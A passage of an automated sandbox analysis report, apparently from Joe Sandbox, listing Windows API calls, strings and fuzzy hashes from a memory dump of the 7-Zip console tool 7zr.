                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID:
                                              • API String ID: 1795875747-0
                                              • Opcode ID: 7d20ee1a074b87442135979c326f58e771d94d8dda812d638c1080938d23eeb5
                                              • Instruction ID: b51c10a0bc2a547952934a5a3206eff6d104eeef987df2a3c736ce8bd6c5e09f
                                              • Opcode Fuzzy Hash: 7d20ee1a074b87442135979c326f58e771d94d8dda812d638c1080938d23eeb5
                                              • Instruction Fuzzy Hash: 61D0123250421DABCF156B94DC05CDD77BCEF08254704441BF945F2190EA75E51497A4
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2F74A
                                                • Part of subcall function 00D2F784: __EH_prolog.LIBCMT ref: 00D2F789
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,00CF785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00CF7B65
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D480AF
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                                • Part of subcall function 00D3BDB5: __EH_prolog.LIBCMT ref: 00D3BDBA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 3744649731-0
                                              APIs
                                              • FindClose.KERNELBASE(00000000,?,00CF6880), ref: 00CF6853
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID:
                                              • API String ID: 1795875747-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputc
                                              • String ID:
                                              • API String ID: 1992160199-0
                                              APIs
                                              • SetFileTime.KERNELBASE(?,?,?,?,00CF7C65,00000000,00000000,?,00CFF238,?,?,?,?), ref: 00CF7C49
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,00CF7D81,?,?,?), ref: 00CF7D3E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memmove
                                              • String ID:
                                              • API String ID: 2162964266-0
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,00D03D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03E12
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,?,00CF75AF,00000002,?,00000000,00000000), ref: 00CF7657
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000), ref: 00D76B31
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              APIs
                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D76BAC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                              • Instruction ID: d0b173abeb8222350892d09cf8f5796c552bafb83d9ed52b39ab2dc7b1d049fc
                                              • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                              • Instruction ID: a085da1754123b30d81b3b31d5ecf4dadd1a5f84dda8b7be68737ece6f461427
                                              • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 2776204276de3807dac7050951fe374351e97eab27ae8cca13194db67bce0e4a
                                              • Instruction ID: df62086e98ab901d2c64ae6f46cbd0e39f9c3c21aa33f236cd1d3fde4665ceb2
                                              • Opcode Fuzzy Hash: 2776204276de3807dac7050951fe374351e97eab27ae8cca13194db67bce0e4a
                                              • Instruction Fuzzy Hash: 31A00271515301DBDA051B10EE094897B61EB85627B21545BF057A05718B314860BA15
                                              APIs
                                              Similarity
                                              • API ID: Version
                                              • String ID:
                                              • API String ID: 1889659487-0
                                              • Opcode ID: c6439fcb35b63e539141302dec65a58c93f15d5bc50d1685ed8f10e0633cc778
                                              • Instruction ID: 581c223af487bc8246ed4969afeb93cc13e8df6f6ab1471214ca47ac74aa6aa4
                                              • Opcode Fuzzy Hash: c6439fcb35b63e539141302dec65a58c93f15d5bc50d1685ed8f10e0633cc778
                                              • Instruction Fuzzy Hash: 05D05B729214154FDF00772CD8063597BA5F760300FCC4954D869C1153F97DC655C2F2
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00CFC09E
                                              • memcmp.MSVCRT(?,00DA0258,00000010), ref: 00CFC0BB
                                              • memcmp.MSVCRT(?,00DA0348,00000010), ref: 00CFC0CE
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 55efa8b5fd700e3d2afd3f566e5718171bc429d4fe78c8d75c0731e9d4adb39b
                                              • Instruction ID: 65f0b736cf257830c8a1fcf49f86f22a2fd469591b0baa188e0284ecc621b6e1
                                              • Opcode Fuzzy Hash: 55efa8b5fd700e3d2afd3f566e5718171bc429d4fe78c8d75c0731e9d4adb39b
                                              • Instruction Fuzzy Hash: F791637174071DABD7A49A22DD81FBB37A8EF65750F008428FE5AD7101F720AE18C7A2
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                                              • API String ID: 3519838083-1909666238
                                              • Opcode ID: fabadec87268c111cad1a6ef5a39ffce00390231aec1c88ef42272ad7bf41173
                                              • Instruction ID: 56641789853d74b039104583424cb59311f853ecadc4f3aba53a7907216470b4
                                              • Opcode Fuzzy Hash: fabadec87268c111cad1a6ef5a39ffce00390231aec1c88ef42272ad7bf41173
                                              • Instruction Fuzzy Hash: 28C1AE31904289AFCF14DB64C451AFD7F61EF0230AF1980A9EC895B162DB309E8DDB62
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF64F8
                                              • GetCurrentThreadId.KERNEL32 ref: 00CF6508
                                              • GetTickCount.KERNEL32 ref: 00CF6513
                                              • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00CF651E
                                              • GetTickCount.KERNEL32 ref: 00CF6578
                                              • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 00CF65C5
                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00CF65EC
                                                • Part of subcall function 00CF5D7A: __EH_prolog.LIBCMT ref: 00CF5D7F
                                                • Part of subcall function 00CF5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00CF5DA1
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Similarity
                                              • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                              • String ID: .tmp$d
                                              • API String ID: 1989517917-2797371523
                                              • Opcode ID: 06357d32dae191a743b3e397f653e35d4e7f3d5ab8cc81e4d006f9b23a931e77
                                              • Instruction ID: 3f4d53e173f3df183a653ad091a3a91ffb62a6460a36072f7e394b86e675c67d
                                              • Opcode Fuzzy Hash: 06357d32dae191a743b3e397f653e35d4e7f3d5ab8cc81e4d006f9b23a931e77
                                              • Instruction Fuzzy Hash: C041D03291022C9BDF55ABA0D8557FD7B71FF55354F14012AEA12F72A1CB358900DB23
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: H_prologfputs
                                              • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                              • API String ID: 1798449854-1259944392
                                              • Opcode ID: b39f240f136c3c96923560129b8c11c2ead8ea4b0bea09bc81a36033eaccfd49
                                              • Instruction ID: 53763d8f0c20dfafbb39b5d2553d38276fbc2500132ca719c74f4b976ce2a749
                                              • Opcode Fuzzy Hash: b39f240f136c3c96923560129b8c11c2ead8ea4b0bea09bc81a36033eaccfd49
                                              • Instruction Fuzzy Hash: 4021B032A00715DFCB04EB94D542ABEB3A5FF64314B04002AF642D73A2CB70ED069BA5
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA091
                                                • Part of subcall function 00CF9BAA: RegCloseKey.ADVAPI32(?,?,00CF9BA0), ref: 00CF9BB6
                                              Strings
                                              Similarity
                                              • API ID: CloseH_prolog
                                              • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                                              • API String ID: 1579395594-270022386
                                              • Opcode ID: 247598ccad419dfd7687a2caf33365f123307e058df1b9a33d1de8af158b6a96
                                              • Instruction ID: 64b19bc3a0906f9e5bbbddac1b9a5f43c188379908392a3e37b3daa93934c0b5
                                              • Opcode Fuzzy Hash: 247598ccad419dfd7687a2caf33365f123307e058df1b9a33d1de8af158b6a96
                                              • Instruction Fuzzy Hash: 3D518771A00209DFCF54EF94C8919BEF7B5FF58340F51842DE615A7291DB70AA05CB62
                                              APIs
                                              • memset.MSVCRT ref: 00D503F5
                                              • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00D50490
                                              • memset.MSVCRT ref: 00D50618
                                              Strings
                                              Similarity
                                              • API ID: memset$memcpy
                                              • String ID: $@
                                              • API String ID: 368790112-1077428164
                                              • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                              • Instruction ID: 060d7b011c5a7f376f6dff6fcd6f484400913011050a14fcbf5d4de8f69bdb92
                                              • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                              • Instruction Fuzzy Hash: C6919F31900309AFEF20DF24C841BDABBB1EF54315F048959ED9A56192DB70BA9DCFA0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF6141
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                              • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00CF6197
                                              • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CF626E
                                              • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 00CF62A9
                                                • Part of subcall function 00CF6096: __EH_prolog.LIBCMT ref: 00CF609B
                                                • Part of subcall function 00CF6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00CF60DF
                                              • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CF6285
                                              Similarity
                                              • API ID: ErrorLast$H_prolog$DeleteFile
                                              • String ID:
                                              • API String ID: 3586524497-0
                                              • Opcode ID: 3553a171365fc4a7ba85bb47d3d036884762ef64681c55432239d59d26382268
                                              • Instruction ID: 460c9e99fa5e2aab4e3069e139da77658a15a6ca264d6cb5df0c698bdebb58ca
                                              • Opcode Fuzzy Hash: 3553a171365fc4a7ba85bb47d3d036884762ef64681c55432239d59d26382268
                                              • Instruction Fuzzy Hash: B851CE31C0421CEADF95EBE4D855BFDBB74AF11350F10815AEA51731D2CB352A0AEB62
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00D044DB
                                              • memcmp.MSVCRT(?,00DA0128,00000010), ref: 00D044EE
                                              • memcmp.MSVCRT(?,00DA0228,00000010), ref: 00D0450B
                                              • memcmp.MSVCRT(?,00DA0248,00000010), ref: 00D04528
                                              • memcmp.MSVCRT(?,00DA01C8,00000010), ref: 00D04545
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 168841dfa999a87597ea30b4fab2451fa912d6c04c16596a8b9421251f002a8d
                                              • Instruction ID: f0a76025eefc94034f0c65b610910323d2a2e5381be66a1b9bcc60887acdaef2
                                              • Opcode Fuzzy Hash: 168841dfa999a87597ea30b4fab2451fa912d6c04c16596a8b9421251f002a8d
                                              • Instruction Fuzzy Hash: BB21B0B27403086FE704AE219C86FBE37A8DB517A0B048038FE099A285F664DE0487B0
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: !$LZMA2:$LZMA:
                                              • API String ID: 3519838083-3332058968
                                              • Opcode ID: e74663020d64a72ae78e4fd8ca555da7e1564a8b278931a11a1fcdd99dedae85
                                              • Instruction ID: 53100001af70dff6fac6c2c4d29b88c7f08dc8713a09aa4a4a318b64b7546ae0
                                              • Opcode Fuzzy Hash: e74663020d64a72ae78e4fd8ca555da7e1564a8b278931a11a1fcdd99dedae85
                                              • Instruction Fuzzy Hash: 2C610231A2010AAEDF25CB64C84AFFD7BB1AF15340F1860A9E44677172CB70AE80CB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA389
                                                • Part of subcall function 00CFA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,00CFA3C1,00000001), ref: 00CFA4CD
                                                • Part of subcall function 00CFA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CFA4DD
                                              Strings
                                              Similarity
                                              • API ID: AddressH_prologHandleModuleProc
                                              • String ID: : $ SP:$Windows
                                              • API String ID: 786088110-3655538264
                                              • Opcode ID: 87c965d2819866b9b9dff881d423a01ab4df8403da50ee2593f0c08a4dbce634
                                              • Instruction ID: b28fd0704fc73c3bcbe63102be12c57d82e72c85de47c6bb95d0c1443bc01b79
                                              • Opcode Fuzzy Hash: 87c965d2819866b9b9dff881d423a01ab4df8403da50ee2593f0c08a4dbce634
                                              • Instruction Fuzzy Hash: B331F97290021D9BCF59EBE5C8529FEBBB4BF14350F400069E706731D1DB715B89EAA2
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2602A
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D26044
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D26060
                                              Strings
                                              Similarity
                                              • API ID: CriticalSection$EnterH_prologLeave
                                              • String ID: v
                                              • API String ID: 367238759-3261393531
                                              • Opcode ID: a0171a0bfdedbf5efa507fbe2a15c37f2cb6817e5b07c4497af01f0e6cf49877
                                              • Instruction ID: 607c7772d37c2ea0000f0c41cb504b6aa5137948f35cff4dadac2a3a0930e529
                                              • Opcode Fuzzy Hash: a0171a0bfdedbf5efa507fbe2a15c37f2cb6817e5b07c4497af01f0e6cf49877
                                              • Instruction Fuzzy Hash: 7CF0F436910214EFCB019F98D909A9EBBA8EF45354F14846AF405A7311C7B59A008BB4
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,00CFA3C1,00000001), ref: 00CFA4CD
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CFA4DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 1646373207-1489217083
                                              • Opcode ID: 5fbef7fb2e3f71537d8137ecf6b537506354747089432d18572053346c50903e
                                              • Instruction ID: ce7571017b3b9c5daedb64bc2f675c561b06fa3e648e2e641dcabdc3a3cabeb3
                                              • Opcode Fuzzy Hash: 5fbef7fb2e3f71537d8137ecf6b537506354747089432d18572053346c50903e
                                              • Instruction Fuzzy Hash: 92D0C7713743101FBBA067B5BC4EBF6165C8B41B51706A457F914D1140E6D49E8241BA
                                              APIs
                                              • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 00D10359
                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 00D10382
